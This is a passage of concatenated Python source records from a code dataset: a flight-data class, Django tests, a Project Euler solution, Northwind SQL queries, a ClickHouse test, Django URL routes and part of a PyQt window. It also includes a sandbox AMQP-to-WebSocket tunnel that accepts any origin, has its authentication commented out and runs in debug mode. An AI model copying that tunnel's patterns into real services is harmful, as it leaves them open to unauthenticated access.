IndexError(Config._EXCEPTION_2)\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    def getObservation(self, field, i):\n        if field in Config._OBSERVATIONS:\n            if i in range(0, len(self.__flightData[field])):\n                return self.__flightData[field][i]\n            else:\n                raise IndexError(Config._EXCEPTION_2)\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    def observationSize(self, field):\n        if field in Config._OBSERVATIONS:\n            return len(self.__flightData[field])\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    def isComplete(self):\n        for i in Config._WEATHER:\n            if self.__flightData[i] <= 0:\n                return False\n        for i in Config._SPECIFICATIONS:\n            if self.__flightData[i].strip() == \"\":\n                return False\n        for i in Config._MASS_COMPONENTS:\n            if i == \"Eggs\":\n                if len(self.__flightData[i]) < 1:\n                    return False\n                else:\n                    for j in self.__flightData[i]:\n                        if j <= 0:\n                            return False\n            elif self.__flightData[i] <= 0:\n                return False\n        for i in Config._RESULTS:\n            if self.__flightData[i] <= 0:\n                return False\n        for i in Config._OBSERVATIONS:\n            if len(self.__flightData[i]) < 1:\n                return False\n        return True\n","sub_path":"src/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"510314837","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ChangedIdentitiesContext(Model):\n \"\"\"ChangedIdentitiesContext.\n\n :param group_sequence_id: Last Group SequenceId\n :type group_sequence_id: int\n :param identity_sequence_id: Last Identity SequenceId\n :type identity_sequence_id: int\n \"\"\"\n\n _attribute_map = {\n 'group_sequence_id': {'key': 'groupSequenceId', 'type': 'int'},\n 'identity_sequence_id': {'key': 'identitySequenceId', 'type': 'int'}\n }\n\n def __init__(self, group_sequence_id=None, identity_sequence_id=None):\n super(ChangedIdentitiesContext, self).__init__()\n self.group_sequence_id = group_sequence_id\n self.identity_sequence_id = identity_sequence_id\n","sub_path":"vsts/vsts/identity/v4_1/models/changed_identities_context.py","file_name":"changed_identities_context.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"624444411","text":"from django.test import TestCase, Client\r\nfrom order.models import DomesticOrder\r\nfrom collegeaccess.models import Client_Lead\r\nfrom django.http import HttpResponseRedirect\r\nfrom userapp.forms import LeadForm\r\nfrom core.models import CourseCategory\r\nimport datetime\r\n\r\nclass DirectLeadTestCase ( TestCase ):\r\n\r\n fixtures = [ \"domesticorder.json\",\"country.json\", \"region.json\", \"state.json\", \"core_data.json\" ,\"content.json\",]\r\n \r\n def setUp(self):\r\n self.data_dict={ 'fname': 'test','email':'test@a.com','contact_number':'9898989898','current_location':'1','area_of_interest':[7],'sub_category':[37],'highest_qa_level':'Studying 10th','year_of_entrance':'2011','checkbox':'1' }\r\n self.institute_id=15267\r\n self.category=7\r\n \r\n def test_direct_orders( self ):\r\n \r\n order=DomesticOrder.objects.get(complementary=1,institute=15267)\r\n self.failUnless(isinstance(order, DomesticOrder))\r\n \r\n def test_direct_form(self):\r\n \r\n l_form = LeadForm( self.data_dict )\r\n self.assertTrue(l_form.is_valid())\r\n self.failUnless(isinstance(l_form, LeadForm))\r\n \r\n def test_direct_lead_submition_test( self ):\r\n \r\n order=DomesticOrder.objects.get(complementary=1,institute=self.institute_id)\r\n self.failUnless(isinstance(order, DomesticOrder))\r\n count=len([lead.leadsent for lead in Client_Lead.objects.filter(client=order,leadsent__email=self.data_dict['email'],leadsent__contact_number=self.data_dict['contact_number'],send_date__gt=datetime.date.today()-datetime.timedelta(days=180))])\r\n if count == 0:\r\n l_form = LeadForm( self.data_dict )\r\n self.assertTrue(l_form.is_valid())\r\n lead_obj = l_form.save()\r\n client_lead=Client_Lead(leadsent=lead_obj,client=order)\r\n self.failUnless(isinstance(client_lead, Client_Lead))\r\n category=CourseCategory.objects.get(id=self.category)\r\n self.failUnless(isinstance(category, CourseCategory))","sub_path":"fghqlnoebnq/lms_migration/userapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586660506","text":"#What is the value of the first triangle number to have over 
five hundred divisors?\n\nfrom math import floor\nfrom math import sqrt\n\ndef gen_tri_num(a):\n tri_num = 0\n for i in range(1, a+1):\n tri_num = tri_num + i\n return tri_num\n \ndef num_of_divisors(tri_num):\n divisor_list = []\n for i in range(1, int(floor(sqrt(tri_num)))+1):\n if tri_num%i == 0:\n x = i\n y = tri_num/i\n if x != y:\n divisor_list.append(i)\n divisor_list.append(tri_num/i)\n else:\n divisor_list.append(i)\n return len(divisor_list)\n\nnum_of_divisors(gen_tri_num(7))\n\n\ni = 1\nwhile num_of_divisors(gen_tri_num(i)) < 501:\n i += 1\nelse:\n print(gen_tri_num(i))\n","sub_path":"p12.py","file_name":"p12.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637532965","text":"#\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nimport argparse\nimport base64\nimport functools\nimport json\nimport sys\nimport uuid\nimport weakref\n\nfrom threading import Thread, Lock\n\ntry:\n from urllib.parse import urlencode\nexcept ImportError:\n from urllib import urlencode\n\nimport pika\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.auth\nimport tornado.escape\nimport tornado.concurrent\n\n\nSETTINGS = {}\n\n\nclass Error(Exception):\n \"\"\"Base error class for exceptions in this module\"\"\"\n pass\n\nclass ConsumerConfigError(Error):\n \"\"\"Raised when an issue with consumer configuration occurs\"\"\"\n def __init__(self, message):\n self.message = message\n\nclass ConsumerKeyError(Error):\n def __init__(self, message, key):\n self.message = message\n self.key = key\n\nclass AuthError(Error):\n \"\"\"Raised when something went wrong during authentication\"\"\"\n def __init__(self, error, code):\n self.message = error\n self.code = code\n\n\n\nclass PikaAsyncConsumer(Thread):\n\n \"\"\"\n The primary entry point for routing incoming messages to the proper handler.\n\n \"\"\"\n\n def __init__(self, rabbitmq_url, exchange_name, queue_name,\n exchange_type=\"direct\", routing_key=\"#\"):\n \"\"\"\n Create a new instance of Streamer.\n\n Arguments:\n rabbitmq_url -- URL to RabbitMQ server\n exchange_name -- name of RabbitMQ exchange to join\n queue_name -- name of RabbitMQ queue to join\n\n Keyword Arguments:\n exchange_type -- one of 'direct', 'topic', 'fanout', 'headers'\n (default 'direct')\n routing_keys -- the routing key that this consumer listens for\n (default '#', receives all messages)\n\n \"\"\"\n print(\"Creating new consumer\")\n super(PikaAsyncConsumer, self).__init__(daemon=True)\n self._connection = None\n self._channel = None\n self._shut_down = False\n self._consumer_tag = None\n self._url = rabbitmq_url\n self._client_list = []\n self._lock = Lock()\n\n # The following are necessary to guarantee that both the 
RabbitMQ\n # server and Streamer know where to look for messages. These names will\n # be decided before dispatch and should be recorded in a config file or\n # else on a per-job basis.\n self._exchange = exchange_name\n self._exchange_type = exchange_type\n self._queue = queue_name\n self._routing_key = routing_key\n\n def add_client(self, client):\n \"\"\"Add a new client to the recipient list.\n\n Arguments:\n client -- a reference to the client object to add\n \"\"\"\n self._lock.acquire()\n # Create a weakref to ensure that cyclic references to WebSocketHandler\n # objects do not cause problems for garbage collection\n self._client_list.append(weakref.ref(client))\n self._lock.release()\n\n def remove_client(self, client):\n \"\"\"Remove a client from the recipient list.\n\n Arguments:\n client -- a reference to the client object to remove\n \"\"\"\n self._lock.acquire()\n for i in range(0, len(self._client_list)):\n # Parentheses after _client_list[i] to deference the weakref to its\n # strong reference\n if self._client_list[i]() is client:\n self._client_list.pop(i)\n break\n self._lock.release()\n\n\n def connect(self):\n \"\"\"\n Create an asynchronous connection to the RabbitMQ server at URL.\n\n \"\"\"\n return pika.SelectConnection(pika.URLParameters(self._url),\n on_open_callback=self.on_connection_open,\n on_close_callback=self.on_connection_close,\n stop_ioloop_on_close=False)\n\n def on_connection_open(self, unused_connection):\n \"\"\"\n Actions to perform when the connection opens. This may not happen\n immediately, so defer action to this callback.\n\n Arguments:\n unused_connection -- the created connection (by this point already\n available as self._connection)\n\n \"\"\"\n self._connection.channel(on_open_callback=self.on_channel_open)\n\n def on_connection_close(self, connection, code, text):\n \"\"\"\n Actions to perform when the connection is unexpectedly closed by the\n RabbitMQ server.\n\n Arguments:\n connection -- the connection that was closed (same as self._connection)\n code -- response code from the RabbitMQ server\n text -- response body from the RabbitMQ server\n\n \"\"\"\n self._channel = None\n if self._shut_down:\n self._connection.ioloop.stop()\n else:\n self._connection.add_timeout(5, self.reconnect)\n\n def reconnect(self):\n \"\"\"\n Attempt to reestablish a connection with the RabbitMQ server.\n \"\"\"\n self._connection.ioloop.stop() # Stop the ioloop to completely close\n\n if not self._shut_down: # Connect and restart the ioloop\n self._connection = self.connect()\n self._connection.ioloop.start()\n\n def on_channel_open(self, channel):\n \"\"\"\n Store the opened channel for future use and set up the exchange and\n queue to be used.\n\n Arguments:\n channel -- the Channel instance opened by the Channel.Open RPC\n \"\"\"\n self._channel = channel\n self._channel.add_on_close_callback(self.on_channel_close)\n self.declare_exchange()\n\n\n def on_channel_close(self, channel, code, text):\n \"\"\"\n Actions to perform when the channel is unexpectedly closed by the\n RabbitMQ server.\n\n Arguments:\n connection -- the connection that was closed (same as self._connection)\n code -- response code from the RabbitMQ server\n text -- response body from the RabbitMQ server\n \"\"\"\n self._connection.close()\n\n def declare_exchange(self):\n \"\"\"\n Set up the exchange that will route messages to this consumer. 
Each\n RabbitMQ exchange is uniquely identified by its name, so it does not\n matter if the exchange has already been declared.\n \"\"\"\n self._channel.exchange_declare(self.declare_exchange_success,\n self._exchange,\n self._exchange_type)\n\n def declare_exchange_success(self, unused_connection):\n \"\"\"\n Actions to perform on successful exchange declaration.\n \"\"\"\n self.declare_queue()\n\n def declare_queue(self):\n \"\"\"\n Set up the queue that will route messages to this consumer. Each\n RabbitMQ queue can be defined with routing keys to use only one\n queue for multiple jobs.\n \"\"\"\n self._channel.queue_declare(self.declare_queue_success,\n self._queue)\n\n def declare_queue_success(self, method_frame):\n \"\"\"\n Actions to perform on successful queue declaration.\n \"\"\"\n self._channel.queue_bind(self.munch,\n self._queue,\n self._exchange,\n self._routing_key\n )\n\n def munch(self, unused):\n \"\"\"\n Begin consuming messages from the Airavata API server.\n \"\"\"\n self._channel.add_on_cancel_callback(self.cancel_channel)\n self._consumer_tag = self._channel.basic_consume(self._process_message)\n\n def cancel_channel(self, method_frame):\n if self._channel is not None:\n self._channel._close()\n\n def _process_message(self, ch, method, properties, body):\n \"\"\"\n Receive and verify a message, then pass it to the router.\n\n Arguments:\n ch -- the channel that routed the message\n method -- delivery information\n properties -- message properties\n body -- the message\n \"\"\"\n print(\"Received Message: %s\" % body)\n self._lock.acquire()\n for client in self._client_list:\n # Parentheses after client to deference the weakref to its\n # strong reference\n client().write_message(body)\n self._lock.release()\n self._channel.basic_ack(delivery_tag=method.delivery_tag)\n\n def stop_consuming(self):\n \"\"\"\n Stop the consumer if active.\n \"\"\"\n if self._channel:\n self._channel.basic_cancel(self.close_channel, self._consumer_tag)\n\n def close_channel(self, unused):\n \"\"\"\n Close the channel to shut down the consumer and connection.\n \"\"\"\n self._channel.queue_delete(queue=self._queue)\n self._channel.close()\n\n def run(self):\n \"\"\"\n Start a connection with the RabbitMQ server.\n \"\"\"\n self._connection = self.connect()\n self._connection.ioloop.start()\n\n def stop(self):\n \"\"\"\n Stop an active connection with the RabbitMQ server.\n \"\"\"\n self._closing = True\n self.stop_consuming()\n\n\nclass Wso2OAuth2Mixin(tornado.auth.OAuth2Mixin):\n _OAUTH_AUTHORIZE_URL = \"https://idp.scigap.org:9443/oauth2/authorize\"\n _OAUTH_ACCESS_TOKEN_URL = \"https://idp.scigap.org:9443/oauth2/token\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, username, password, callback=None):\n print(\"Authenticating user %s\" % (username))\n http = self.get_auth_http_client()\n body = urlencode({\n \"client_id\": SETTINGS[\"oauth_client_key\"],\n \"client_secret\": SETTINGS[\"oauth_client_secret\"],\n \"grant_type\": SETTINGS[\"oauth_grant_type\"],\n \"username\": username,\n \"password\": password\n })\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL, functools.partial(self._on_access_token, callback), method=\"POST\", body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n print(str(response))\n print(response.body)\n print(response.error)\n future.set_exception(AuthError(response.error, response.code))\n return\n\n print(response.body)\n future.set_result(tornado.escape.json_decode(response.body))\n\nclass 
AuthHandler(tornado.web.RequestHandler, Wso2OAuth2Mixin):\n    def get_current_user(self):\n        expires_in = self.get_secure_cookie(\"expires-in\", max_age_days=SETTINGS['maximum_cookie_age'])\n        print(expires_in)\n        if expires_in:\n            return self.get_secure_cookie(\"ws-auth-token\", max_age_days=float(expires_in))\n        return None\n\n    def set_default_headers(self):\n        self.set_header(\"Content-Type\", \"text/plain\")\n        self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n        self.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n        self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\n    def get(self):\n        if self.get_current_user():\n            self.set_status(200)\n            print(\"Authenticated\")\n            self.write(\"Authenticated\")\n\n        else:\n            self.set_status(403)\n            print(\"Not Authenticated\")\n            self.write(\"Not Authenticated\")\n\n    @tornado.gen.coroutine\n    def post(self):\n        try:\n            username = self.get_body_argument(\"username\")\n            password = self.get_body_argument(\"password\")\n            redirect = self.get_body_argument(\"redirect\")\n            if username == \"\" or password == \"\":\n                raise tornado.web.MissingArgumentError\n\n            access = yield self.get_authenticated_user(username, password)\n            days = (access[\"expires_in\"] / 3600) / 24 # Convert to days\n            print(days)\n            self.set_secure_cookie(\"ws-auth-token\",\n                                   access[\"access_token\"],\n                                   expires_days=days)\n            self.set_secure_cookie(\"expires-in\",\n                                   str(1),\n                                   expires_days=SETTINGS['maximum_cookie_age'])\n            self.write(\"Success\")\n        except tornado.web.MissingArgumentError:\n            print(\"Missing an argument\")\n            self.set_status(400)\n            self.write(\"Authentication information missing\")\n        except AuthError as e:\n            print(\"The future freaks me out\")\n            self.set_status(e.code)\n            self.set_header(\"Content-Type\", \"text/html\")\n            self.write(e.message)\n\n        success_code = \"\"\"

<html><body>Redirecting to %(url)s</body></html>
\n\n \"\"\" % { 'url': redirect}\n self.set_status(200)\n self.redirect(redirect)\n #return self.render_string(success_code)\n\n\n\nclass AMQPWSHandler(tornado.websocket.WebSocketHandler):#, Wso2OAuth2Mixin):\n\n \"\"\"\n Pass messages to a connected WebSockets client.\n\n A subclass of the Tornado WebSocketHandler class, this class takes no\n action when receiving a message from the client. Instead, it is associated\n with an AMQP consumer and writes a message to the client each time one is\n consumed in the queue.\n \"\"\"\n\n # def set_default_headers(self):\n # self.set_header(\"Access-Control-Allow-Origin\", \"*\")\n # self.set_header(\"Access-Control-Allow-Headers\", \"x-requested-with\")\n # self.set_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')\n\n def check_origin(self, origin):\n \"\"\"Check the domain origin of the connection request.\n\n This can be made more robust to ensure that connections are only\n accepted from verified PGAs.\n\n Arguments:\n origin -- the value of the Origin HTTP header\n \"\"\"\n return True\n\n def open(self, resource_type, resource_id):\n \"\"\"Associate a new connection with a consumer.\n\n When a new connection is opened, it is a request to retrieve data\n from an AMQP queue. The open operation should also do some kind of\n authentication.\n\n Arguments:\n resource_type -- \"experiment\" or \"project\" or \"data\"\n resource_id -- the Airavata id for the resource\n \"\"\"\n self.stream.set_nodelay(True)\n self.resource_id = resource_id\n self.write_message(\"Opened the connection\")\n\n self.add_to_consumer()\n\n # expires_in = self.get_secure_cookie(\"expires_in\", max_age_days=SETTINGS[\"maximum_cookie_age\"])\n # if expires_in is not None and self.get_secure_cookie(\"ws-auth-token\", max_age_days=float(expires_in)):\n # print(\"Found secure cookie\")\n # self.write_message(\"Authenticated\")\n # self.add_to_consumer()\n # else:\n # print(\"Closing connection\")\n # self.close()\n\n def on_message(self, message):\n \"\"\"Handle incoming messages from the client.\n\n Tornado requires subclasses to override this method, however in this\n case we do not wish to take any action when receiving a message from\n the client. 
The purpose of this class is only to push messages to the\n client.\n \"\"\"\n print(message)\n message = tornado.escape.json_decode(message)\n access = yield self.get_authenticated_user(message[\"username\"], message[\"password\"])\n access = access\n days = (access[\"expires_in\"] / 3600) / 24 # Convert to days\n print(days)\n self.set_secure_cookie(\"ws-auth-token\",\n access[\"access_token\"],\n expires_days=days)\n self.set_secure_cookie(\"expires_in\",\n str(days),\n expires_days=SETTINGS['maximum_cookie_age'])\n\n\n def on_close(self):\n try:\n print(\"Closing connection\")\n self.application.remove_client_from_consumer(self.resource_id, self)\n except KeyError:\n print(\"Error: resource %s does not exist\" % self.resource_id)\n finally:\n self.close()\n\n def add_to_consumer(self):\n try:\n self.application.add_client_to_consumer(self.resource_id, self)\n except AttributeError as e:\n print(\"Error: tornado.web.Application object is not AMQPWSTunnel\")\n print(e)\n\n\nclass AMQPWSTunnel(tornado.web.Application):\n\n \"\"\"\n Send messages from an AMQP queue to WebSockets clients.\n\n In addition to the standard Tornado Application class functionality, this\n class maintains a list of active AMQP consumers and maps WebSocketHandlers\n to the correct consumers.\n \"\"\"\n\n def __init__(self, consumer_list=None, consumer_config=None, handlers=None,\n default_host='', transforms=None, **settings):\n print(\"Starting AMQP-WS-Tunnel application\")\n super(AMQPWSTunnel, self).__init__(handlers=handlers,\n default_host=default_host,\n transforms=transforms,\n **settings)\n\n self.consumer_list = {} if consumer_list is None else consumer_list\n if consumer_config is None:\n raise ConsumerConfigError(\"No consumer configuration provided\")\n self.consumer_config = consumer_config\n\n def consumer_exists(self, resource_id):\n \"\"\"Determine if a consumer exists for a particular resource.\n\n Arguments:\n resource_id -- the consumer to find\n \"\"\"\n return resource_id in self.consumer_list\n\n def add_client_to_consumer(self, resource_id, client):\n \"\"\"Add a new client to a consumer's messaging list.\n\n Arguments:\n resource_id -- the consumer to add to\n client -- the client to add\n \"\"\"\n if not self.consumer_exists(resource_id):\n print(\"Creating new consumer\")\n print(self.consumer_config)\n consumer = PikaAsyncConsumer(self.consumer_config[\"rabbitmq_url\"],\n self.consumer_config[\"exchange_name\"],\n self.consumer_config[\"queue_name\"],\n exchange_type=self.consumer_config[\"exchange_type\"],\n routing_key=resource_id)\n print(\"Adding to consumer list\")\n self.consumer_list[resource_id] = consumer\n print(\"Starting consumer\")\n consumer.start()\n\n print(\"Adding new client to %s\" % (resource_id))\n consumer = self.consumer_list[resource_id]\n consumer.add_client(client)\n\n def remove_client_from_consumer(self, resource_id, client):\n \"\"\"Remove a client from a consumer's messaging list.\n\n Arguments:\n resource_id -- the consumer to remove from\n client -- the client to remove\n \"\"\"\n if self.consumer_exists(resource_id):\n print(\"Removing client from %s\" % (resource_id))\n self.consumer_list[resource_id].remove_client(client)\n #else:\n # raise ConsumerKeyError(\"Trying to remove client from nonexistent consumer\", resource_id)\n\n def shutdown(self):\n \"\"\"Shut down the application and release all resources.\n\n\n \"\"\"\n for name, consumer in self.consumer_list.items():\n consumer.stop()\n #consumer.join()\n #self.consumer_list[name] = None\n\n 
#self.consumer_list = {}\n\n\n\nif __name__ == \"__main__\":\n i = open(sys.argv[1])\n config = json.load(i)\n i.close()\n\n SETTINGS[\"oauth_client_key\"] = config[\"oauth_client_key\"]\n SETTINGS[\"oauth_client_secret\"] = config[\"oauth_client_secret\"]\n SETTINGS[\"oauth_grant_type\"] = config[\"oauth_grant_type\"]\n SETTINGS[\"maximum_cookie_age\"] = config[\"maximum_cookie_age\"]\n\n settings = {\n \"cookie_secret\": base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes),\n #\"xsrf_cookies\": True\n }\n\n application = AMQPWSTunnel(handlers=[\n (r\"/auth\", AuthHandler),\n (r\"/(experiment)/(.+)\", AMQPWSHandler)\n ],\n consumer_config=config,\n debug=True,\n **settings)\n\n application.listen(8888)\n\n try:\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n application.shutdown()\n","sub_path":"sandbox/amqpwstunnel/python/amqpwstunnel.py","file_name":"amqpwstunnel.py","file_ext":"py","file_size_in_byte":21353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173816376","text":"import sqlite3\n\nnorthwind_conn = sqlite3.connect('northwind_small.sqlite3')\nnorthwind_cursor1 = northwind_conn.cursor()\n\nmost_expensive_query = (\n 'SELECT ProductName FROM ' +\n '(SELECT * FROM Product ' +\n 'Order by UnitPrice DESC LIMIT 10);'\n)\n\nmost_expensive = northwind_cursor1.execute(most_expensive_query).fetchall()\nmost_expensive_string = ''\nfor i in range(len(most_expensive) - 1):\n most_expensive_string = most_expensive_string + most_expensive[i][0] + ', '\nmost_expensive_string = most_expensive_string + most_expensive[9][0]\n\n\"\"\"10 MostExpensive Items\"\"\"\nprint(f'The 10 most expensive items are: {most_expensive_string}.\\n')\n\n\nbirth_dates = northwind_cursor1.execute(\n 'SELECT BirthDate FROM Employee;'\n ).fetchall()\nhire_dates = northwind_cursor1.execute(\n 'SELECT HireDate FROM Employee;'\n ).fetchall()\n\n\ndef split_dates(dates):\n years = []\n months = []\n days = []\n for i in range(len(dates)):\n split_date = dates[i][0].split('-')\n years.append(int(split_date[0]))\n months.append(int(split_date[1]))\n days.append(int(split_date[2]))\n\n return years, months, days\n\n\ndef get_average(list):\n return int(sum(list) / len(list))\n\n\nbrith_years, birth_months, birth_days = split_dates(birth_dates)\nhire_years, hire_months, hire_days = split_dates(hire_dates)\n\nage = []\nfor i in range(len(brith_years)):\n year = (hire_years[i] - brith_years[i])\n if(hire_months[i] < birth_months[i]):\n year -= 1\n elif(hire_months[i] == birth_months[i]):\n if(hire_days[i] < birth_days[i]):\n year -= 1\n age.append(year)\n\n\"\"\"Average age of employees at hire\"\"\"\nprint(f'The Average Age of Employees at the time of hire is' +\n f'{get_average(age)}.\\n')\n\n\nemployee_cities = northwind_cursor1.execute(\n 'SELECT City FROM Employee;'\n ).fetchall()\ncities = []\ncity_agess = []\n\nfor i in range(len(employee_cities)):\n employee_cities[i] = employee_cities[i][0]\n if employee_cities[i] not in cities:\n cities.append(employee_cities[i])\n city_agess.append([age[i]])\n else:\n index = cities.index(employee_cities[i])\n city_agess[index].append(age[i])\n\n\"\"\"Average age of employees at hire per city\"\"\"\nfor i in range(len(cities)):\n print(f'The Average Age of Employees from {cities[i]}' +\n f'at the time of hire is {get_average(city_agess[i])}.\\n\\n')\n\nnorthwind_cursor1.close()\n\nnorthwind_cursor2 = northwind_conn.cursor()\n\nproduct_supplier_price_query = ('SELECT Product.ProductName, ' +\n 
'Supplier.CompanyName FROM Product ' +\n                                'INNER JOIN Supplier ON '\n                                'Product.SupplierId = Supplier.id ' +\n                                'ORDER BY Product.UnitPrice DESC ' +\n                                'LIMIT 10;')\n\n\"\"\"10 MostExpensive Items with their Suppliers\"\"\"\nprint(str(northwind_cursor2.execute(product_supplier_price_query).fetchall()) + '\\n\\n')\n\n\nlargest_category_query = ('SELECT Category.CategoryName ' +\n                          'FROM Product ' +\n                          'INNER JOIN Category ' +\n                          'ON CategoryId = Category.id ' +\n                          'GROUP BY Category.CategoryName ' +\n                          'ORDER BY count(DISTINCT ProductName) DESC '\n                          'LIMIT 1;')\nlargest_category = northwind_cursor2.execute(largest_category_query).fetchone()[0]\n\"\"\"Largest Category\"\"\"\nprint(f'The Largest Category is {largest_category}')\n\nnorthwind_cursor2.close()\nnorthwind_conn.close()\n","sub_path":"DSPT1-Sprint-10/northwind.py","file_name":"northwind.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"442423468","text":"import time\n\nimport pytest\nfrom helpers.cluster import ClickHouseCluster\nfrom helpers.test_tools import assert_eq_with_retry\nfrom helpers.network import PartitionManager\n\n\ndef fill_nodes(nodes, shard):\n    for node in nodes:\n        node.query(\n            '''\n                CREATE DATABASE test;\n\n                CREATE TABLE test.test_table(date Date, id UInt32)\n                ENGINE = ReplicatedMergeTree('/clickhouse/tables/test{shard}/replicated', '{replica}') ORDER BY id PARTITION BY toYYYYMM(date) SETTINGS min_replicated_logs_to_keep=3, max_replicated_logs_to_keep=5, cleanup_delay_period=0, cleanup_delay_period_random_add=0;\n            '''.format(shard=shard, replica=node.name))\n\n\ncluster = ClickHouseCluster(__file__)\nnode1 = cluster.add_instance('node1', main_configs=['configs/remote_servers.xml'], with_zookeeper=True)\nnode2 = cluster.add_instance('node2', main_configs=['configs/remote_servers.xml'], with_zookeeper=True)\n\n\n@pytest.fixture(scope=\"module\")\ndef start_cluster():\n    try:\n        cluster.start()\n\n        fill_nodes([node1, node2], 1)\n\n        yield cluster\n\n    except Exception as ex:\n        print(ex)\n\n    finally:\n        cluster.shutdown()\n\ndef test_readonly_metrics(start_cluster):\n    assert node1.query(\"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\") == \"0\\n\"\n\n    with PartitionManager() as pm:\n        ## make node1 readonly -> heal -> readonly -> heal -> detach table -> heal -> attach table\n        pm.drop_instance_zk_connections(node1)\n        assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"1\\n\", retry_count=300, sleep_time=1)\n\n        pm.heal_all()\n        assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"0\\n\", retry_count=300, sleep_time=1)\n\n        pm.drop_instance_zk_connections(node1)\n        assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"1\\n\", retry_count=300, sleep_time=1)\n\n\n        node1.query(\"DETACH TABLE test.test_table\")\n        assert \"0\\n\" == node1.query(\"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\")\n\n        pm.heal_all()\n        node1.query(\"ATTACH TABLE test.test_table\")\n        assert_eq_with_retry(node1, \"SELECT value FROM system.metrics WHERE metric = 'ReadonlyReplica'\", \"0\\n\", retry_count=300, sleep_time=1)\n\n","sub_path":"tests/integration/test_system_metrics/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"367121400","text":"from django.urls 
import path\n\nfrom . import views\n\n\napp_name = 'projects'\n\nurlpatterns = [\n    path('<int:pk>/delete', views.ProjectsDeleteView.as_view(), name='delete'),\n    path('<int:pk>/edit', views.ProjectsUpdateView.as_view(), name='edit'),\n    path('<int:pk>/', views.ProjectsDetailView.as_view(), name='detail'),\n    path('new/', views.ProjectsCreateView.as_view(), name='create'),\n    path('', views.ProjectsListView.as_view(), name='list'),\n]","sub_path":"portfolio/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"6348915","text":"from PyQt5.QtWidgets import QWidget, QListWidgetItem\nfrom PyQt5.Qt import QMessageBox\nfrom models import Dataset, Project, Monkey, TimeInterval, AllocatException\nfrom views.ui import Ui_projectWindow\n\n\nclass ProjectWindow(QWidget):\n\n    # noinspection PyUnresolvedReferences\n    def __init__(self):\n        super(ProjectWindow, self).__init__()\n        self.ui = Ui_projectWindow()\n        self.ui.setupUi(self)\n        self.lst = self.ui.listWidget\n\n        self.current_rec_id = None\n        self._set_prj_by_emp()\n\n        self._load_list(Dataset.projects.keys())\n        self._load_emp_list()\n\n        self.lst.itemClicked.connect(self._rec_selected)\n        self.ui.addBtn.clicked.connect(self._add_clicked)\n        self.ui.saveBtn.clicked.connect(self._save_clicked)\n        self.ui.removeBtn.clicked.connect(self._remove_clicked)\n        self.ui.asnsBtn.clicked.connect(self._asns_clicked)\n        self.ui.empList.currentIndexChanged.connect(self._emp_filter)\n        self.ui.allBtn.clicked.connect(self._all_clicked)\n\n        self.setMinimumWidth(800)\n\n    def _set_prj_by_emp(self):\n        d = {}\n        for asn in Dataset.assignments:\n            if asn.employee_name not in d:\n                d[asn.employee_name] = []\n            d[asn.employee_name].append(asn.project_name)\n        self.prj_by_emp = d\n\n    def _load_list(self, nicknames, selected=None):\n        self.lst.clear()\n        if not nicknames:\n            return\n        selected_index = 0\n        for idx, nickname in enumerate(sorted(nicknames)):\n            item = QListWidgetItem(nickname)\n            self.lst.addItem(item)\n            if nickname == selected:\n                selected_index = idx\n        self.lst.setCurrentItem(self.lst.item(selected_index))\n        self._rec_selected()\n\n    def _load_emp_list(self):\n        self.ui.empList.clear()\n        emps = sorted(Dataset.employees.keys())\n        for name in emps:\n            self.ui.empList.addItem(name)\n\n    def _emp_filter(self):\n        emp_name = self.ui.empList.currentText()\n        projects = 